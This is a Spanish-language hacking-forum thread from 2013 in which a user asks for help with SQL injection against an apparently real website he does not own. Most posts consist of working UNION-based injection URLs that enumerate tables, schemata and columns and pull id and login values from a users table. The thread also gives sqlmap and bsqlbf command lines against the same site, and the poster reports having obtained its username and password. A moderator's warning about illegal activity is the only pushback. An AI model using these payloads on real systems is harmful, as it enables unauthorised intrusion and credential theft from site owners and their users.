elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Curso de javascript por TickTack


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Probando inyecciones SQL - Columnas ocultas
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Probando inyecciones SQL - Columnas ocultas  (Leído 6,555 veces)
Zeioth

Desconectado Desconectado

Mensajes: 8



Ver Perfil
Probando inyecciones SQL - Columnas ocultas
« en: 9 Julio 2013, 02:02 am »

Buenas, me estoy documentando sobre inyecciones SQL. He seguido varios manuales, pero llevo todo el dia atascado en un punto. Asique os pongo los pasos que he seguido, y os pido consejo:

He conseguido obtener el nombre de todas las tablas de la BD:
http://www.miurl.com.br/mi.php?mid=-1+UNION+SELECT+1,2,group_concat%28table_name%29,4,5,6,7,8,9+from+information_schema.tables--

Sin embargo la consulta que deberia devolver las columnas solo muestra las columnas por defecto de information_schema:
http://www.miurl.com.br/mi.php?mid=-1+UNION+SELECT+1,2,group_concat%28column_name%29,6,5,6,7,8,9+from+information_schema.columns--

si compruebo las bases de datos que hay, solo veo information_schema y dbro
http://www.miurl.com.br/mi.php?mid=-1+UNION+SELECT+1,2,group_concat%28schema_name%29,database%28%29,5,6,7,8,9+from+information_schema.schemata--

con lo cual deduzco que no tengo permisos para ver la BD mysql. Tambien he estado haciendo consultas a ciegas intentando adivinar las columnas de una tabla pero no ha habido suerte:
http://www.miurl.com.br/mi.php?mid=-1+UNION+SELECT+1,2,group_concat%28id%29,6,5,6,7,8,9+from+dbro.cartas--

ENTOCES: Mi pregunta es... Puedo conseguir mas informacion de la BD o llegué a un punto muerto?
« Última modificación: 9 Julio 2013, 16:19 pm por Zeioth » En línea

BlackM4ster


Desconectado Desconectado

Mensajes: 499


Error, el teclado no funciona. Pulse F1 para continuar


Ver Perfil WWW
Re: Probando inyecciones SQL - Columnas ocultas
« Respuesta #1 en: 9 Julio 2013, 09:11 am »

Vas bien, pero, personalmente, suelo usar primero sqlmap para ver si me ahorro trabajo manual, y si no va, pues entonces es cuando me pongo a hacerlo a mano

He pasado Sqlmap y parece que es una bind, asi que a sacar las columnas por diccionario -.-
En línea

- Pásate por mi web -
https://codeisc.com
engel lex
Moderador Global
***
Desconectado Desconectado

Mensajes: 15.514



Ver Perfil
Re: Probando inyecciones SQL - Columnas ocultas
« Respuesta #2 en: 9 Julio 2013, 09:16 am »

hey! si la web no es tuya no andes posteando los links de acciones ilegales en el foro -.-
En línea

El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.
Søra

Desconectado Desconectado

Mensajes: 260

"Piensa por ti mismo"Antifascismo Antiracismo


Ver Perfil
Re: Probando inyecciones SQL - Columnas ocultas
« Respuesta #3 en: 9 Julio 2013, 09:33 am »

Antes de ver las columnas tendras que especificar la tabla no?

Código:
http://www.miurl.com.br/vcartas.php?mid=-1+UNION+SELECT+1,2,group_concat(column_name),6,5,6,7,8,9+from+information_schema.columns+where+table_name=0x(valorHexDelNombreDeLaTabla)--

un saludo!
« Última modificación: 13 Julio 2013, 22:07 pm por Søra » En línea






Se busca sabio para intercambio:
Todo lo que se por la mitad de lo que desconozco.
BlackM4ster


Desconectado Desconectado

Mensajes: 499


Error, el teclado no funciona. Pulse F1 para continuar


Ver Perfil WWW
Re: Probando inyecciones SQL - Columnas ocultas
« Respuesta #4 en: 9 Julio 2013, 15:08 pm »

hey! si la web no es tuya no andes posteando los links de acciones ilegales en el foro -.-

Cierto
En línea

- Pásate por mi web -
https://codeisc.com
Zeioth

Desconectado Desconectado

Mensajes: 8



Ver Perfil
Re: Probando inyecciones SQL - Columnas ocultas
« Respuesta #5 en: 9 Julio 2013, 16:17 pm »

Disculpad, ya esta editado.

BlackM4ster: el sqlmap lo he estado probando pero, no me da nisiquiera el nombre de las tablas, solo el de las BD.

Søra: Esa consulta no funciona porque information_schema.columns no muestra las columnas. Entoces no sirve de nada filtrar :(

Me surje una duda mas: Para probar consultas a ciegas esto seria correcto o debo indicar el nombre del campo y tabla en hexadecimal? No entiendo muy bien cuando hay que hacerlo en hexadecimal y cuando no es necesario. Un saludo y gracias por la ayuda!:
EJEMPLO: http://www.miurl.br/mi.php?mid=-1+UNION+SELECT+1,2,ID,4,5,6,7,8,9+from+usuarios--
« Última modificación: 9 Julio 2013, 16:21 pm por Zeioth » En línea

Søra

Desconectado Desconectado

Mensajes: 260

"Piensa por ti mismo"Antifascismo Antiracismo


Ver Perfil
Re: Probando inyecciones SQL - Columnas ocultas
« Respuesta #6 en: 9 Julio 2013, 17:29 pm »

Código:
http://www.miurl.com.br/vcartas.php?mid=-1+UNION+SELECT+1,2,group_concat%28id,0x3a,login%29,6,5,6,7,8,9+from+usuarios--

la pass? :O
« Última modificación: 13 Julio 2013, 22:06 pm por Søra » En línea






Se busca sabio para intercambio:
Todo lo que se por la mitad de lo que desconozco.
BlackM4ster


Desconectado Desconectado

Mensajes: 499


Error, el teclado no funciona. Pulse F1 para continuar


Ver Perfil WWW
Re: Probando inyecciones SQL - Columnas ocultas
« Respuesta #7 en: 9 Julio 2013, 18:36 pm »

BlackM4ster: el sqlmap lo he estado probando pero, no me da nisiquiera el nombre de las tablas, solo el de las BD.

El sqlmap si que da el nombre de las tablas, solo falla en las columnas -.-
En línea

- Pásate por mi web -
https://codeisc.com
Zeioth

Desconectado Desconectado

Mensajes: 8



Ver Perfil
Re: Probando inyecciones SQL - Columnas ocultas
« Respuesta #8 en: 9 Julio 2013, 19:27 pm »

Ya he sacado el usuario y la contraseña pero no estoy muy contento... Las he terminado adivinando. Quiero probar a hacerlo por fuerza bruta, por aprender. He probado el sbqlfb pero aun no logro que tire.

BlackM4ster He corrido esto, no se si habra algun error...
Código:
"python sqlmap.py -u http://www.miurl.com.br/vcartas.php?mid=4203 --tables -D safecosmetics"

Søra Si puedes oculta la url de tus mensajes tambien por favor.  :-*

Probando brute force (sin exito aun):
Código:
c:\bsqlbf-v2.1>bsqlbf-v2-1.pl -url http://www.miurl.com.br/vcartas.php?mid=4200 -match "Carta Megalith" -database dbro -sql "select 1"
Creo que el problema puede estar en el match porque la subconsulta que esta haciendo la web devuelve mas de una columna.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Sobre inyecciones en EXE's y DLL « 1 2 3 4 »
Programación Visual Basic
Martinss 33 11,075 Último mensaje 18 Junio 2006, 21:03 pm
por Eternal Idol
DLL contra inyecciones
Programación Visual Basic
XP. 0 1,414 Último mensaje 2 Octubre 2006, 03:58 am
por XP.
Inyecciones sql en oracle
Nivel Web
nacho87 0 2,707 Último mensaje 1 Febrero 2009, 19:50 pm
por nacho87
Inyecciones Batch
Scripting
0x0309 4 5,476 Último mensaje 11 Agosto 2009, 20:15 pm
por 0x0309
Múltiples inyecciones SQL en SMF <= 1.1.10 y 2.0 <= RC1.2 « 1 2 »
Nivel Web
WHK 15 15,056 Último mensaje 23 Octubre 2009, 18:34 pm
por shimpei
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines